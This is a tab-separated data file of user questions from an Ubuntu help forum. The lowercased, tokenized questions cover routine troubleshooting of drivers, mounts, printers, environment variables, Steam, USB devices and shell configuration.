421040	aufs read only branch as another read only branch	my goal is to use an aufs read only branch as another read only branch : i 've got a directory dir0 , then i make : mount -t aufs -o br=dir2=rw : dir0=ro none dir1 this gives me - dir0 - dir1 # read only dir0 - dir2 # write layer of dir1 i now want to use dir1 this way : mount -t aufs -o br=dir4=rw : dir1=ro none dir3 to get - dir0 - dir1 # read only dir0 - dir2 # write layer of dir0 - dir3 # read only dir1 ( dir1 + dir2 ) - dir4 # write layer of dir3 i 'm using ubuntu 12.04 and this should work according to aufs-tools man page : any filesystem can be a branch , but some are not accepted such like sysfs , procfs and unionfs . if you specify such filesystems as an aufs branch , aufs will return an error saying it is unsupported . but i got this error : mount : wrong fs type , bad option , bad superblock on none , missing codepage or helper program , or other error ( for several filesystems ( e.g . nfs , cifs ) you might need a /sbin/mount . helper program ) in some cases useful info is found in syslog - try dmesg | tail or so and dmesg gives me aufs test_add:231 : mount [ 3346 ] : unsupported filesystem , ( aufs ) am i missing something here ? regards , robin
421042	what `` echo ! t `` do ?	i do n't know how many of you have encountered this , but i find it interesting . maybe also because i do not totally know what the `` echo '' command can do . if anyone has the interest and nerves to give me a couple of reasons for this i would be most grateful . playing is learning and i must ask you to check with your terminal first : what is the output of the command echo ! t in your terminal ? here is what the terminal shows me as an output : echo they are 9 in the fellowship they are 9 in the fellowship the terminal i am playing with is using the default bash shell , on ubuntu 12.04.3 lts . what does `` ! t '' stand for in the `` echo '' command ?
421047	need help errors and lots of missing packages ubuntu 13.10	i am running ubuntu 13.10 on an msi notebook , i am in no way computer literate and to try and fix one small problem i have unintentionally gotten in way over my head , created more problems and am in need of some serious help first of all my original problem , i got internet set up in my new house and although it was showing connected i can only connect through smart phone tethering . my top right hand menu icons are completely gone ( time/date , rythym box , shutdown , setting , the cloud ect ) i am getting constant error reports which through days of trying every sudo command and update i can i still cant get rid of . my software centre , unity dash , software and updates and a few other smaller programs wont work when i try to redownload any of these nothing happens , using sudo commands to install just brings up package not found errors and somewhere along the line i have reverted my updates to look through old release packages and not the newer ones , i have no idea how to fix this . i lost my .deb installer and i cant get it back through the internet or terminal commands so none of my deb files will install after days of trying else i thought maybe ut ubuntu 13.10 or xubuntu 13.10 onto a flashdrive and reboot it in the hope i get my packages and missing programs back , i managed to torrent download ubuntu 13.10 and then realised i dont have the original startup usb creator either , i have tried and failed to download multiple different ones but due to the missing deb . installer and software centre i cant do this either . im not sure what information is needed so please get back to me and ill provide as much as i can i am at a complete loss of what to do so any help would be highly highly appreciated , if this is fixable at all . thanks for your time
421052	java home will not set using /etc/environment	wowee ... ... . echo 'export java_home=/usr/ ' | tee -a /etc/environment open up new terminal echo $ java_home blank why is it sooo hard to set a global env for all users without restarting ? eve tried source ok..i get placing env vars in users .bashrc and using source but why i cant to the same for /etc/environment ?
421055	gigaware usb gamepad not detected	i have a radioshack gigaware pc controller ( cat no . 26-1519 ) . i plugged it in , but it is not listed in lsusb . my lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 007 : id 0b38:0003 gear head keyboard bus 003 device 008 : id 045e:0084 microsoft corp . basic optical mouse bus 002 device 002 : id 04f2 : b249 chicony electronics co. , ltd i tried installing xboxdrv , xserver-xorg-input-joystick , joystick , still nothing .
421059	activating nvidia drivers	when i use system settings-additional drivers- and try to activate ; nvidia binary xorg driver , kernal module and vdpau library , i get this message ; systemerror : unable to correct problems , you have held broken packages . is there anyway to fix this ? ubuntu 12.04 lts
421063	how can i know how many archived logs are saved ?	in /var/log/apt , i am seeing : $ /var/log/apt $ ls -l total 100 -rw-r -- r -- 1 root root 3343 feb 14 22:34 history.log -rw-r -- r -- 1 root root 2156 jan 31 06:03 history.log.1.gz -rw-r -- r -- 1 root root 1288 dec 31 11:14 history.log.2.gz -rw-r -- r -- 1 root root 3232 nov 27 07:22 history.log.3.gz -rw-r -- r -- 1 root root 18813 oct 31 07:11 history.log.4.gz -rw-r -- -- - 1 root adm 20475 feb 14 22:34 term.log -rw-r -- -- - 1 root adm 4862 jan 31 06:03 term.log.1.gz -rw-r -- -- - 1 root adm 3685 dec 31 11:14 term.log.2.gz -rw-r -- -- - 1 root adm 9058 nov 27 07:22 term.log.3.gz -rw-r -- -- - 1 root adm 12452 oct 31 07:11 term.log.4.gz it looks like history.log is being archived once a month . because history.log and its archives are important to me , i want to know : how many archives will be stored before the oldest is deleted ? where is this information located ? can i change the settings to increase the number of logs stored ? ( going from the file sizes and my usage of apt-get , i am not concerned about disk space . ) thank you .
421064	ubuntu 13.10- brightness hotkeys not working	i recently upgraded to ubutnu 13.10 with a fresh install . it used to work fine with the last ubuntu install i had ( 12.04 ) . all of my normal hotkeys work ( sounds , wireless , displays ) except for the brightness for the screen . the bubble notification shows up and goes up and down , but the actual brightness does not change . the following code does n't work- nothing can change the brightness : echo 500 > /sys/class/backlight/intel_backlight/brightness any help would be appreciated , and i added some information about my system in case it 's needed : cat /proc/cmdline boot_image=/boot/vmlinuz-3.11.0-15-generic root=uuid=ffd13d5c-50c7-45dd-bbb5-fc4bca9f8970 ro quiet splash vt.handoff=7 lspci -k | grep -a3 vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) subsystem : dell device 0597 kernel driver in use : i915 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) for i in /sys/class/backlight/* ; do echo $ i ; cat $ i/brightness ; cat $ i/actual_brightness ; cat $ i/max_brightness ; done /sys/class/backlight/acpi_video0 65 65 99 /sys/class/backlight/intel_backlight 2182 2182 4882
421071	missing /usr/include/sys	i just installed ubuntu 13.10 under vmware running on a windows 8 system . i was looking for the file include/sys/syscall.h and noticed that the include/sys directory does not exist . i tried reinstalling linux-libc-dev and linux-headers- $ ( uname -r ) but the include/sys directory still is n't there . how do i install this directory ? i know syscall.h is in the bits directory but there are other files in include/sys i use often i need .
421074	consistent dialog concerning wine-silverlight	i installed pipelight and as part of the installation procedure , after everything was done in terminal , an external window appeared and started automatically installing wine-silverlight . however , after several minutes of no progress , it seemed like that part of installation had crashed , eventually i just reboot my machine . now whenever i launch my browser ( i use chromium , i realize that may be an issue ? ) , i get the following messages : [ pipelight : lin : unknown ] attached to process . [ pipelight : lin : unknown ] checking environment variable pipelight_silverlight5_1_config . [ pipelight : lin : unknown ] searching for config file pipelight-silverlight5.1 . [ pipelight : lin : unknown ] trying to load config file from '/home/scibor/.config/pipelight-silverlight5.1 ' . [ pipelight : lin : unknown ] trying to load config file from '/etc/pipelight-silverlight5.1 ' . [ pipelight : lin : unknown ] trying to load config file from '/usr/share/pipelight/configs/pipelight-silverlight5.1 ' . [ pipelight : lin : unknown ] sandbox not found or not installed ! [ pipelight : lin : silverlight5.1 ] gpu driver check - your driver is supported , hardware acceleration enabled . [ pipelight : lin : silverlight5.1 ] using wine prefix directory /home/scibor/.wine-pipelight/ . [ pipelight : lin : silverlight5.1 ] checking plugin installation - this might take some time . [ install-dependency ] downloading and running wine-silverlight5.1-installer . [ install-dependency ] error : installer for wine-silverlight5.1-installer did not run correctly or was aborted . [ install-dependency ] error : execution of wine-silverlight5.1-installer failed . [ pipelight : lin : silverlight5.1 ] basicplugin.c:346 : checkplugininstallation ( ) : plugin installer did not run correctly ( exitcode = 1 ) . [ pipelight : lin : silverlight5.1 ] basicplugin.c:105 : attach ( ) : plugin not correctly installed - aborting . so far i have only tried the following : sudo apt-get -- reinstall install wine-compholio wine-silverlight5.1-installer wine-mpg2splt-installer but that has not resolved the issue . how can i prevent these messages from showing up ? while this normally may seem trivial , these messages are accompanied by a dialog box showing up stating that wine-silverlight installation is underway , and i do n't want that showing up with every launch of my browser . furthermore , this happens not only on launch but every time i open up a new site .
421075	ubuntu 13.10 usb problem	i recently dualbooted ubuntu 13.10 on top of 12.04 and now both distros wo n't recognize usb devices . it recognizes that i have usb ports but nothing appears in files when i plug in a device through usb . edit : for dmesg | tail [ 854.460876 ] raid6 : sse2x2 747 mb/s [ 854.528879 ] raid6 : sse2x4 1087 mb/s [ 854.528890 ] raid6 : using algorithm sse2x4 ( 1087 mb/s ) [ 854.528898 ] raid6 : using ssse3x2 recovery algorithm [ 854.620728 ] bio : create slab < bio-1 > at 1 [ 854.629208 ] btrfs loaded [ 1551.482251 ] systemd-hostnamed [ 13047 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! [ 2523.892113 ] perf samples too long ( 2519 > 2500 ) , lowering kernel.perf_event_max_sample_rate to 50000 [ 2591.888615 ] psmouse serio2 : touchpad at isa0060/serio2/input0 lost sync at byte 6 [ 2591.909739 ] psmouse serio2 : touchpad at isa0060/serio2/input0 - driver resynced . for lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 064e : d251 suyin corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 006 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 is my webcam built into my netbook . any device i connect does n't get recognized by lsusb .
421077	brother mfc-495cw cupsd issue on ubunutu 13.10	i 'm trying to install the brother linux drivers for my mfc-495cw . i followed the directions at the brother linux download site . lpr and cupswrapper files are confirmed installed . i can not print to this printer using lpd , or usb connections , so i 'm figuring its something to do with cups and/or the driver install . when i try to print , either via cups admin page test page , or via a simple gedit text file , nothing happens , no errors dialogs are given . just silently fails via usb and wifi . following the ubuntu guide to crank up logging for the error_log , i generate this on a test print page attempt via usb : https : //gist.github.com/anonymous/d0f795a2526822e04e37/raw/6b62afa9be8c740c156432040842234db8b67fd1/gistfile1.txt and the error log does display some potentially suspect info ( there may be more , but this is the only thing that catches my eye : d [ 13/feb/2014:21:36:48 -0800 ] [ job 36 ] wrote 1 pages ... d [ 13/feb/2014:21:36:48 -0800 ] [ job 36 ] pid 8773 ( pstops ) exited with no errors . d [ 13/feb/2014:21:36:48 -0800 ] [ job 36 ] pid 8756 ( /usr/lib/cups/filter/pdftops ) exited with no errors . d [ 13/feb/2014:21:36:48 -0800 ] [ job 36 ] /usr/lib/cups/filter/brlpdwrappermfc495cw : 119 : /usr/lib/cups/filter/brlpdwrappermfc495cw : /opt/brother/printers/mfc495cw/cupswrapper/brcupsconfpt1 : not found d [ 13/feb/2014:21:36:48 -0800 ] [ job 36 ] /opt/brother/printers/mfc495cw/lpd/filtermfc495cw : 50 : /opt/brother/printers/mfc495cw/lpd/filtermfc495cw : /opt/brother/printers/mfc495cw/lpd/brmfc495cwfilter : not found d [ 13/feb/2014:21:36:48 -0800 ] [ job 36 ] sent 0 bytes ... d [ 13/feb/2014:21:36:48 -0800 ] [ job 36 ] pid 8757 ( /usr/lib/cups/filter/brlpdwrappermfc495cw ) exited with no errors . d [ 13/feb/2014:21:36:48 -0800 ] [ job 36 ] waiting for read thread to exit ... d [ 13/feb/2014:21:36:48 -0800 ] [ job 36 ] pid 8758 ( /usr/lib/cups/backend/usb ) exited with no errors . d [ 13/feb/2014:21:36:48 -0800 ] [ job 36 ] time-at-completed=1392356208 d [ 13/feb/2014:21:36:48 -0800 ] discarding unused job-completed event ... i can verify these files exist though , with apparently valid permissions : ls -al /opt/brother/printers/mfc495cw/cupswrapper/brcupsconfpt1 -rwxr-xr-x 1 root root 13304 oct 12 2011 /opt/brother/printers/mfc495cw/cupswrapper/brcupsconfpt1 ls -al /opt/brother/printers/mfc495cw/lpd/filtermfc495cw -rwxr-xr-x 1 root root 2050 oct 12 2011 /opt/brother/printers/mfc495cw/lpd/filtermfc495cw ls -al /opt/brother/printers/mfc495cw/lpd/brmfc495cwfilter -rwxr-xr-x 1 root root 664308 oct 12 2011 /opt/brother/printers/mfc495cw/lpd/brmfc495cwfilter any ideas on whats wrong would be great , thanks !
421078	is ubuntu touch available for the atrix 4g and can i see screenshots ?	i use the atrix 4g n m rooted . i want to know if ubuntu touch can be installed through cwm on it or not ? where can i see some screen-shots of ubuntu touch ?
421083	how to open a pdf in dual page view , but for arabic pdf 's ( where pages layout should be from right to left )	i have a pdf in the arabic language . i 've opened it with poppler/cairo or okular but i ca n't figure this out . i know this is so easy but i need help . so arabic books are normally from right to left , so the page numbering is like this physically ( ie how it should be ) : page 2 | page 1 page 4 | page 3 but no matter what options in okular or others , it comes out as : blank | page 1 page 2 | page 3 page 4 | page 5 or ... page 1 | page 2 page 3 | page 4 page 5 | page 6 can you help me ? i 'm so lost . here is a sample pdf : http : //www.musily.usi.ch/documents/arabic.pdf can anyone figure out how to get dual-view to work ? this will help me so much for my studies ... thank you so much !
421084	how do i install the ada compiler ?	is there a free ada compiler available for linux , in particular ubuntu 12.04 ? if so , where can i find it , how do i install it and how do i run it ?
421087	installing gnome 3.10 along ubuntu 13.10 ( mouse cursor missing )	i installed , gnome 3.10 along ubuntu 13.10 , however after installation . my mouse pointer is not showed on my desktop . how can i back and show the mouse pointer ? i was not able to navigate properly because of this .
421090	which version good on thinkpad t42 ?	which version of ubuntu installs good ( with no kernel and cpu problems ) on ibm thinkpad t42 ?
421092	how can i activate mysql database server ?	i have a challenging with my xampp install on ubuntu 12.04 64-bits . after successfully install my xampp server , i do get access to lampp server which further indicate that the mysql database is running . but when i chick the xampp status its indicated the mysql database is deactivated . this is the problem with me for the pass 72 hours am still struggling how to make it activated ? can any one help me with this and also my phpmyadmin show this error : the server is not responding ( or the local server 's socket is not correctly configured ) .
421094	wubi boot up error	just partitioned my hard drive on a compaq presario , model number : cq5320y , and used the windows installer ( wubi ) to download ubuntu 12.04 lts 64-bit and it went through the whole install , and booted with the ubuntu loading screen . at the log in screen , i heard a drumming noise and then the screen went to purple with patterns across it and froze .
421098	remastersys - no user option for live session user	so i changed a little bit of settings of remastersys before i started my build , naming it `` live cd '' instead of `` live session user '' in the live cd name option . after building , i tested it out on my vm and unfortunately , there is no user option for live session user . what do i do ?
421099	how to reinstall ubuntu with uefi in a correct way ?	i decided to migrate from ubuntu 13.10 to 12.04 lts , so i have downloaded .iso image and wrote it to my usb-stick . during the installation , on a stage of partitioning hard drive , i met one problem . i have two big partitions ( windows partition , partition for files ) and it 's all clear about them . but i also have two small partitions . the first one is fat32 , 100mib size and in it there are windows bootloader files , ubuntu bootloader files . the second one is 128mib size , unknown filesystem , `` msftres '' flag . what should i do in order to correctly install ubuntu ? as i know , i should choose the first 100mib fat32-partition as a efi-partition , but i am afraid that windows bootloader files will be destroyed . please , help me .
421101	do i need to add the ppa before update a software via terminal ?	before updating a software which canonical does not support for updates ( like vlc , skype ) , do i need to add the relevant ppa to the system before run `` apt-get install packagename '' or `` apt-get -- only upgrade install packagename '' ? ( i 'm using ubuntu 13.10 )
421107	which version of gtk is compatible with ubuntu arm	i am learning gtk+ 3 on my pc which has ubuntu 13.10 installed . classes such as listbox and stack seem to be unavailable for 13.10 as they are packed in gtk 3.10 which only comes with 14.04 . my aim is to run my own gtk based gui application on a cubieboard ( arm based ) which will have ubuntu arm installed on it . i want to know which version of gtk is supported by supported by ubuntu arm so that i may avoid having to re-write applications in a different version ( not to mention going through the tutorials of that version as well ) .
421109	`/etc/profile.d` really does not want to work for me	does /etc/profile.d work or not ? i create a file rexster-console.sh in /etc/profile.d : alias rexster= '' /var/rexster-console-2.4.0/bin/rexster-console.sh '' -rwxr-xr-x 1 root root 66 feb 15 13:05 rexster-console.sh i even run sh rexster-console.sh . i open up another terminal : root @ ubuntu : /etc/profile.d # rexster rexster : command not found so , what am i missing ?
421110	lm-sensors not showing cpu temperature ?	i have a machine running on top of amd opteron 6380 ( 16-core ) x2 cpus . os details are as follows : version : ubuntu 12.04.3 lts ( precise ) uname -a : linux sysname 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux i installed lm-sensors package on it , and let it perform all the scans that it was proposing . but at the end of it all , i am not able to see any cpu temperatures , it only shows volatages/temperatures for a few pci adapters and thats it ! during scans it detects the cpu as amd family 15h , and show that its going to use the k10temp driver for it , but still no luck . are these amd processors even supported by lm-sensors ? what am i doing wrong or not doing ? any suggestions ?
421111	unable to use gui interface to shut down , suspend , restart in my ubuntu 13.10	i just installed ubuntu 13.10 ( 32-bit ) on my pc . i have never used ubuntu before . it 's great so far , but i am facing a bug . the shutdown , restart , and suspend buttons do not seem to work . if i click the shutdown button , the goodbye dialog box appears . when i then click shutdown , the dialog box just closes and nothing happens . the same thing happens when i click restart . also , nothing happens when i click suspend from the power menu . i am able to use terminal commands to turn off my pc . i searched for this problem and read that this problem was related to the cairo dock . but i do not have cairo dock installed . i have n't installed any software on my ubuntu .
421112	unetbootin ubuntu error	i used unetbootin to make a bootable flash drive installed with ubuntu 12.04 lts 64 bit . it finished and rebooted . when i selected my flash drive from the boot menu it started an automatic boot countdown . but when it reached 0 it just reset back to ten , and did this on and on and on . how can i fix this error ?
421116	how to remove an entry from messaging menu in c	i wrote a simple c program to create a entry in messaging menu.code is shown below . # include < messaging-menu.h > int main ( int argc , char *argv [ ] ) { messagingmenuapp *mmp=messaging_menu_app_new ( `` gnome-terminal.desktop '' ) ; messaging_menu_app_register ( mmp ) ; return 0 ; } and it works as expected . then i add a line 'messaging_menu_app_unregister ( mmp ) ; ' to remove the entry , but failed . # include < messaging-menu.h > int main ( int argc , char *argv [ ] ) { messagingmenuapp *mmp=messaging_menu_app_new ( `` gnome-terminal.desktop '' ) ; messaging_menu_app_register ( mmp ) ; messaging_menu_app_unregister ( mmp ) ; return 0 ; } the api document says messaging_menu_app_unregister ( ) 'completely removes the app from the messaging menu . ' but it does n't work in my machine , ubuntu 13.10 . i want to remove the entry in c or shell .any help ? sorry for my english and thanks in advance .
421118	failed to start x server	everything was ok until i get a dialog box stating : failed to start x server ( your graphical interface ) it might not be set up correctly . do you want to view the x server output to diagnose the problem. ? yes or no gets me to the same end . then after that another box comes up telling me : the x server is now disabled . restart gdm when it is configured correctly so ... how do i configure it . eventually i get `` loading please wait '' ... some stuff then ubuntu @ ubuntu : ~ $ with a blinking underscore
421120	bogus ff user/pass authentication prompt on nxdomains	when i want to log into my router 's web interface , i enter the following into my browser 's address bar and hit return : http : //192.168.1.1/status_router.asp ( actually , i have that bookmarked . ) my browser ( firefox 27.0 ) then immediately displays a dialog box with the following text : a username and password are being requested by http : //192.168.1.1 . the site says : `` buffalostreet-dd-wrt '' ( `` buffalostreet-dd-wrt '' is what i 've named my router . ) just below that text in the dialog box are two fields prompting for user name and password . fine , no problem . this is known as the browser 's http basic authentication prompt . the problem comes when i enter into my browser 's address bar an nxdomain ( non-existent domain ) , or any name that does n't resolve : the exact same dialog box is displayed . this time the message is almost , but not quite , identical : a username and password are being requested by http : //name-that-doesn't-resolve . the site says : `` buffalostreet-dd-wrt '' in all cases , entering user/pass takes me to the router 's web interface . but this dialog box should not be appearing at all when names entered in the address bar do n't resolve . also , going into my router 's dd-wrt web interface , under administration -- > management , if i uncheck the `` info site password protection '' checkbox ( disabling it ) i 've discovered that when i go to a nonexistent web address , instead of the http basic authentication prompt prompting me for username/password , i am immediately shown my router 's status -- > system information page . from that page , if i click on any other tab , i am then prompted for the router 's username/password . ( i decided to go back to having `` info site password protection '' enabled . ) ( i 've also disabled `` web gui management '' remote access . i do n't need remote access activated and it will obviously be safer to keep it disabled . changing this setting did not affect the fact that i get the auth prompt . ) same thing happens when i run firefox in safe mode , and when i use gnu icecat . this leads me to believe that i 've misconfigured something in my router settings , but what ? i 'm using ubuntu 12.04 with gnome classic . the router is a buffalo wzr-hp-ag300h , with firmware version : dd-wrt v24-sp2 ( 04/13/11 ) std - build 16785 . my question is : what 's causing this to happen ? thanks .
421122	malformed line * in source list /etc/apt/sources.list ( dist parse )	can someone tell me how to fix this , e : malformed line 50 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . running ubuntu 12.04 , downloading k9copy when happened , appreciate your help and please give step by step instructions i am very new to this . thanks
421125	cairo dock on other workspaces	the cairo-dock is showing only on the first workspace . how can i enable it in other worksapces ? ( fyi i use lubuntu )
421127	hdmi display screen resolution resets	after i managed to solve my issues with the hdmi - vga converter by reinstalling ubuntu , i was wondering why ubuntu keeps my resolution settings in some cases and loses them in others . i 've written a small batch script that executes the following : xrandr -- newmode `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync xrandr -- addmode hdmi1 1440x900_60.00 this adds 1440x900 to my hdmi display port , allowing me the correct ( highest ) resolution used by the external monitor . some days i shutdown , and start up again , and the settings remains in tact , but then ... sometimes i merely reboot and i have to re-run the script . just curious ... it 's not too much hassle to run the xrandr commands , but would be nice if i did n't have to
421128	how to make bootable usb for ubuntu in windows 7 ?	i downloaded the universal usb installer 1.9.5.2 from this website http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows but when i am running it , the create icon is not working and i am unable to figure out what the problem is ? i even formatted the pendrive ( 8gb ) but also the result was same . please kindly , solve my problem .
421129	sound not working in ubuntu 13.10	yesterday i was trying to follow this for package repair sudo apt-get autoremove sudo apt-get clean sudo apt-get autoclean sudo apt-get check sudo dpkg -- configure -a sudo apt-get -f install sudo apt-get update after the last cmd i enterd i was prompted for update which i minimized for that time , but i realised my sound is gone in ubuntu13.10 the voulme icon in the desktop is muted with a cross sign.i opened sound setting from the volume icon in desktop and its showing the output and input for the audio that used to show me in working condition . when i adjust the volume the muted sign ( cross ) is gone shwing the volume bar but still no sound . to fix this i follow few other steps in here sudo apt-get remove -- purge alsa-base pulseaudio sudo apt-get install alsa-base pulseaudio sudo alsa force-reload bang my volume icon is gone from the desktop . how to fix it ? ? when i type this sudo aplay -l its showing **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc662 rev1 digital [ alc662 rev1 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i alsp followed some command without knowing it to get a fix sudo usermod -ag audio , video , pulse , pulse-access frew sudo chmod o+x /run/user/1000/pulse gedit /etc/default/speech-dispatcher run=no ( its showing `` no '' by default ) nb : i dont have ext sound card its inbuilt
421134	lost data on ntfs drives after booting into windows 8.1	i have successfully installed ubuntu alongside windows 8.1 with intel smart response technology on . the problem is that i can not write any thing into any drives which can be accessed by windows . after booting into windows , anything new written to disk using ubuntu will be lost . i 'm also aware of the fast boot feature of windows so i 've turned it off but that did n't resolve the problem . any help would be really appreciated !
421136	running a command in a new terminal instance in a bash script	i have a bash script where i configure my proxy settings automatically . i have created some aliases in the .bash_aliases file . now there is one command where i ssh into my remote server and do some dynamic port forwarding and essentially create a socks proxy . so i need to configure my proxy settings accordingly . the command looks like : proxy off & & ssh -d < port > < username > @ < hostaddress > i have aliased the above command and when i type the alias in the terminal , i am connected to my remote server successfully . however after this is done , i need to run another command in a new terminal window to configure my newly created socks proxy . basically i just need to run : proxy socks # it configures my laptop to use the socks proxy i ca n't do it in the same terminal window and just & & it after the ssh command because that would mean i am trying to execute the command on the remote server . i want to run this command on my laptop . is there any way i can run the second command in a new terminal window in a single line like we pipe or and different commands ? it 's really inefficient to open a new tab in the terminal every time i ssh into my remote server , just so that i can type a single command to configure my proxy and then close that tab because i do n't need it anymore .
421138	running multiple instances of ubuntu inside ubuntu	i know the title is a little bit odd . but this is the situation . i want to test a mongodb cluster environment , for this mission i need 6 machines . my pc is not that good to host 6 virtual machines . i wonder if there is a piece of software that gives you lightweight sub system inside ubuntu . my main ubuntu is with ui , the subsystems should not have ui . so it is not a real virtual pc , i am looking for a lightweight sub system . where i can define internal networking and install software in . in each virtual machine i want to have different software and different system configuration . vbox is not relevant 6 virtual machines are real heavy on my hardware thanks
421142	shortcut keys does n't work after installing compiz on lubuntu	i have lubuntu on my laptop . i installed compiz with many fighting recently : ) . now compiz works but shortcut keys i defined in lubuntu do n't work anymore . i defined those shortcuts in this file : ~/.config/openbox/lubuntu-rc.xml ( maybe lxde-rc.xml in other lxde enabled distros ) what should i do now ?
421147	i ca n't log in after i inserted some variables in my environment file	i installed 12.04 . yesterday i tried installing tomcat server and java . there was some errors in that installation and when i tried to open my system after some time i could n't login . at that time i found its in loop . when i used terminal using ctrl+alt+f1 . i can login there , and after login there shows one error which i incurred while installing java . it shows like in 31 line . syntax error near unexpected token ' ( ' and also in line export java_home=/media/f25acc3e5acbfcfb/program files ( x86 ) /java
421148	unity-2d on trusty 14.04	i recently got a laptop for uni work , i had trouble with installation of the normal supported versions of ubuntu and had to use trusty 14.04 to get running , my question now is how can i set it to unity-2d if possible . my laptop gets severe framerate issues with unity-3d due to low end specs . any alternative answers are welcome i just want to move onto a low-end shell but unity-2d is preferrable . thanks .
421150	adding 'soft link ' to julia	i would like to be able to open the software `` julia '' by simply typing 'julia ' in a terminal at any location ( like i can do for , say , firefox ) . currently i have to type cd ~/julia ./julia according to the documentation i must : add a soft link to the julia executable in the julia directory to /usr/local/bin ( or any suitable directory already in your path ) . i do n't fully understand softlinks , but i ca n't figure out why this does n't work : ln -s ~/julia /usr/local/bin why wo n't this allow me to access the contents of the ~/julia file ( including the julia executable ) directly ? thanks !
421152	samba file sharing over wan	how do i get access to smb over wan . i can access the server over lan . i 've forward port 445 , but when i try to connect , the connection times out . i am using ubuntu desktop 13.10 as the server and android as the client .
421153	after 13.10 upgrade : roxterm default terminal	i have just upgraded to 13.10 and found that ctrl+alt+t will now launch roxterm ( of which i have n't even heard before ) . opening a `` terminal '' from the dash still opens the old gnome terminal . why did this change with the upgrade and how can i ( or should n't i ? ) set gnome terminal to be the default again ?
421155	ubuntu usb device not mount	i using ubuntu in virtualbox , and when connect to usb device , i can see them using lsusb , however it is not mount in anywhere , and fdisk -l also did n't show any external device . what did i do wrong and how can i access to my usb thanks
421156	booting ubuntu on a laptop with win8 peri stalled	i install ubuntu both with wubi and the regular installation . now my ubuntu would not boot directly just by clicking/selecting ubuntu at startup . i am forced to go to the boot manager every time i wan na boot ubuntu what can i do to change that ?
421157	ca n't see notifications on notifications bar	i have messed up with my notification bar such that its not showing time and battery status . how can i get them back ? i am using gnome-classic for now . here is the screenshot .
421158	is it safe to disable resize_inode on ext4 fs ?	i have 2tb spanned lvm ext4 volume which contains large and mostly static files . with `` static '' i mean they usualy do n't change in time . the volume is 99 % full , and adding new files becomes very slow operation . as the volume is big enought , the remaining space of 1 % is about 25gb , so i want to use it . i assume my troubles are result of anti-file-fragmentation mechanism incorporated in ext4 . to avoid that behvior i want to disable resize_inode . i 'm not sure am i right it will help me , but i want to try . does someone knows is it safe or not to desable resize_inode feature ? command : sudo tune2fs -o^resize_inode /dev/mapper/data-data
421167	libgl error : could n't dlopen libudev.so.1 or libudev.so.0 , driver detection may be broken	terminal output : felix @ felix-ubuntu : ~ $ steam running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 0_client ) libgl error : could n't dlopen libudev.so.1 or libudev.so.0 , driver detection may be broken . steam : ../../../../src/loader/loader.c:129 : asserted_dlsym : assertion `result ' failed . ilocalize : :addfile ( ) failed to load file `` public/steambootstrapper_english.txt '' . [ 2014-02-15 10:53:45 ] startup - updater built feb 10 2014 16:03:16 uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140215105345_1.dmp /home/felix/.local/share/steam/steam.sh : 755. sor : 8084 félbeszakítva ( core készült ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' mv : stat ”/home/felix/.steam/registry.vdf” sikertelen : nincs ilyen fájl vagy könyvtár installing bootstrap /home/felix/.local/share/steam/bootstrap.tar.xz reset complete ! restarting steam by request ... running steam on ubuntu 14.04 64-bit steam_runtime has been set by the user to : /home/felix/.local/share/steam/ubuntu12_32/steam-runtime installing breakpad exception handler for appid ( steam ) /version ( 0_client ) libgl error : could n't dlopen libudev.so.1 or libudev.so.0 , driver detection may be broken . steam : ../../../../src/loader/loader.c:129 : asserted_dlsym : assertion `result ' failed . ilocalize : :addfile ( ) failed to load file `` public/steambootstrapper_english.txt '' . [ 2014-02-15 10:53:47 ] startup - updater built feb 10 2014 16:03:16 uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140215105347_1.dmp /home/felix/.local/share/steam/steam.sh : 755. sor : 8212 félbeszakítva ( core készült ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' i 'm using ubuntu 13.10 and i have an intel q35 ( gma 3100 ) . steam worked just fine on 12.04 and 13.04 the problem is only with 13.10 .
421168	i am unable to connect my samsung gt-s7562 with data cable	i have installed ubuntu 12.04 and samsung galaxy s duos . i am unable to connect it with my system via data cable . please tell me steps so that i can transfer my files to my system .
421172	facebook client that shows whole message history	i tried many facebook clients but i still miss one specific feature : showing all messages . both thunderbird and pidgin show all messages i sent over this client but not the other messages . does anybody know such a client or an additional plugin for this task ? is is possible to download facebook messages ?
421173	maliit onscreen keyboard installed on msi windpad 110w tablet in saucy , but will not open	i downloaded maliit keyboard via 'apt-get ' and the install went ahead without a hitch , however the joy ends there as i am at a loss as to why it will not work.maliit ran perfectly on this tablet in 12.04 lts . could someone please provide me with definitive instructions on how to properly download and configure maliit for 13.10 . thank-you in advance .
